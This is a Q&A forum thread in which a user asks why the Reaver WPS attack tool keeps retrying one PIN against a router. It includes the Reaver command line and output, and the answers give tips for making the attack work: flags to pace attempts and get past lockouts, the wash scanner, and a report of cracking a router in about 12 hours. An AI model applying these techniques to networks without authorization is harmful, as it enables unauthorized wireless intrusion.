4

This question is for anyone who has tried or succeeded to crack WiFi WPA/WPA2 keys with BackTrack Linux and Reaver. So, I wanted to test it on my WiFi router. I started everything as described here. But I got this error:

root@bt:~# reaver -i mon0 -b 74:31:70:05:4B:A7 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 74:31:70:05:4B:A7
[+] Switching mon0 to channel 1
[+] Associated with 74:31:70:05:4B:A7 (ESSID: ALICE-WLAN20)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
^C
[+] Nothing done, nothing to save

It tries the same pin over and over, can anyone explain to me what the problem is, and how I can fix it?

S.L. Barth
  • 5,486
  • 8
  • 38
  • 47
faikabd
  • 271
  • 1
  • 4
  • 7
  • 2
    Not a security question, but a support question for Reaver. (Which appears to be answered in their FAQ: "**Reaver just tries the same pin over and over** Make sure your target AP supports WPS. Run the walsh tool to scan for WPS-enabled APs and make sure your target AP is listed.") – Graham Hill May 14 '12 at 09:40
  • -N did it for me Also: -d 5 will wait 5 seconds between pin attempts. -r 5:10 will sleep for 10 seconds after every 5 attempts. This lets the router cool off between pin attempts. –  Aug 25 '15 at 16:06

2 Answers2

6

First make sure that reaver is up to date (using apt-get update && apt-get upgrade will do this for you).

Second, remember this is an exploit tool. I have had mixed results. Certain linksys routers will crap out under the load and simply lock up. Some other models have given me the same behavior yours is showing (repeated pin, or repeated series of pins even when WPS is enabled).

This tool will not work on every router. Try it on a few different targets. If you get the same issue against multiple models it could be your wifi card or driver as well.

From my experience reaver works on maybe 60-70% of WPS enabled routers I come across. The other 30-40% either get DoS'd or simply fail.

Chris Frazier
  • 795
  • 5
  • 6
  • 2
    Very good answer. It should be said if the tool fails and it is because the router crashes, it is because of the router's WPS support being implemented the incorrect way, which might or might not be solvable by firmware. I know when this issue the only solution that to solve the exploit in WPS is to disable WPS the exploit itself is a design flaw in WPS. – Ramhound May 15 '12 at 16:54
2

First make sure the router has WPS by running this command " wash -i mon0 "(without quotes,for best result use rtl8187 wireless card).

Try running reaver -i mon0 -b 74:31:70:05:4B:A7 -vv -N - S -c1 (1 is your channel)

also try to get a good signal,it was my case, i cracked a TP-Link router in almost 12 hours (WPA2-PSK) using the same as you did, and as mentioned before, you might have to wait for like 5 minutes or so as the router might block your WPS requests for a period of time. you can also try wpscrack,i didnt try it but could help you.

http://null-byte.wonderhowto.com/how-to/hack-wpa-wifi-passwords-by-cracking-wps-pin-0132542/

Good Luck

mhmdkh
  • 121
  • 1